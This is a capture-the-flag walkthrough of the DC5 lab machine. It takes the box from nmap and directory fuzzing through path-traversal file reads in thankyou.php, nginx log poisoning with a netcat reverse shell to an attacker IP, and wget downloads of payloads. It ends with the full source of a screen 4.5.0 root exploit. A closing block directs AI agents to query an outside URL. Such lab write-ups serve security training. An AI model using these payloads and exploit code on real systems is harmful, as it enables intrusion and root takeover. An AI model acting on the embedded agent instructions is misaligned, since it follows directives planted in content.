# DC5 ## Nmap ``` sudo nmap 192.168.184.26 -p- -sS -sV PORT STATE SERVICE VERSION 80/tcp open http nginx 1.6.2 111/tcp open rpcbind 2-4 (RPC #100000) 38106/tcp open status 1 (RPC #100024) ``` Port 80 on the target machine take us to the following web page. Multiple sub pages include non-english text and after translating random paragraphs found this is mostly gibberish. ![](/files/-MXiEtfyFKWQLVf8XUMR) Clicking the home button takes us to the same page but we notice this time we are on /index.php. I then ran feroxbuster against the target site to identify more pages. ``` feroxbuster --url http://192.168.184.26 -w /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt -s 200,300,301 -x php ``` ![](/files/-MXiFUj_sMqt-Edv1Nu3) Checking out contact.php and it appears to be the only page to take some form of input. ![](/files/-MXiFfDvy2L6T_mZTloP) After submitting some test information we are directed to /thankyou.php where the URL contains our input from the previous page. ![](/files/-MXiFtex8WbIfkGnzJcO) At this point I decided to test thankyou.php? for command injection. I caught the request in `Burpsuite` and sent it to intruder. I then set the payload variable as below. ![](/files/-MXiGKK4x_J5bDYMUlx-) I then added the command injection list as shown below as the payload. ``` cmd=../../../../../etc/passwd ?exec=../../../../../etc/passwd ?command=../../../../../etc/passwd ?execute../../../../../etc/passwd ?ping=../../../../../etc/passwd ?query=../../../../../etc/passwd ?jump=../../../../../etc/passwd ?code=../../../../../etc/passwd ?reg=../../../../../etc/passwd ?do=../../../../../etc/passwd ?func=../../../../../etc/passwd ?arg=../../../../../etc/passwd ?option=../../../../../etc/passwd ?load=../../../../../etc/passwd ?process=../../../../../etc/passwd ?step=../../../../../etc/passwd ?read=../../../../../etc/passwd ?function=../../../../../etc/passwd ?req=../../../../../etc/passwd ?feature=../../../../../etc/passwd ?exe=../../../../../etc/passwd ?module=../../../../../etc/passwd ?payload=../../../../../etc/passwd ?run=../../../../../etc/passwd ?print=../../../../../etc/passwd ?file=../../../../../etc/passwd ``` Ensure URL encoding is turned off as this was causing incorrect results as it was encoding `'?'`. ![](/files/-MXiGudCjcvN0UC9p8mL) Viewing the results of the payload after show that the `?file=` parameter appears to be vulnerable due to the content length being greatly different form the other values. ![](/files/-MXiHII3CmJDckPeoE8q) Viewing this in the browser shows us valid results. ![](/files/-MXiHkwywqvyciHxhsGu) We can fuzz for further files using `wfuzz` and the command below: ``` wfuzz -c -w lfi.txt --hl 42 http://192.168.184.26/thankyou.php?file=../../../../../../../FUZZ ``` The LFI list can be downloaded from here {% file src="/files/-MXiMAlo-TSolXTWueY9" %} LFI list {% endfile %} ![](/files/-MXiLwQrAEq5DBP6XZpA) We have two interesting LFI paths found once `wfuzz` completes: ``` /var/log/nginx/access.log /var/log/nginx/error.log ``` Checking out access.log we can see requests we have made. ![](/files/-MXmpr-JjycXGofk9cg-) We can capture a request in `Burpsuite` and inject a PHP reverse shell into the User-Agent field. When the code is injected into the log we are able to get a reverse shell. ![](/files/-MXmq6t20vDqc2Tt67e0) Where the code snippet below is used for the RCE: ``` &1|nc 192.168.49.211 80 >/tmp/f') ?> ``` With a netcat listener listening we can then access the log files again at: When we attempt to load the log files the page should hang and we get a reverse shell. ![](/files/-MXmqQpQGnmF5p9h3Olh) Searching for SUID commands on the machine find the binary screen-4.5.0 has the SUID bit set. ``` find / -perm -u=s -type f 2>/dev/null ``` ![](/files/-MXn6uhEtbRGUQ3BVBH6) Researching on Google shows a local privilege escalation exploit for this binary version. {% embed url="" %} We first need to create some files and break down the script to get this to work. Follow the instructions below to achieve shell. {% tabs %} {% tab title="libhax.c" %} ``` #include #include #include __attribute__ ((__constructor__)) void dropshell(void){ chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755); unlink("/etc/ld.so.preload"); printf("[+] done!\n"); } ``` {% endtab %} {% endtabs %} **Compile libhax.c** `gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c` {% tabs %} {% tab title="rootshell.c" %} ``` #include int main(void){ setuid(0); setgid(0); seteuid(0); setegid(0); execvp("/bin/sh", NULL, NULL); } ``` {% endtab %} {% endtabs %} **Compile rootshell.c** `gcc -o /tmp/rootshell /tmp/rootshell.c`\*\* \*\* Create exploit bash script. {% tabs %} {% tab title="exploit.sh" %} ``` #!/bin/bash cd /etc umask 000 # because screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" echo "[+] Triggering..." screen -ls ``` {% endtab %} {% endtabs %} Upload compiled files to target machine. ``` wget http://192.168.49.211/rootshell wget http://192.168.49.211/libhax.so wget http://192.168.49.211/exploit.sh ``` Once uploaded make the bash script executable: ``` chmod +x exploit.sh ``` Execute exploit.sh then after run `/tmp/rootshell` to gain shell as root. ![](/files/-MXn6IQspZrAM3bILfT4) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/dc5.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.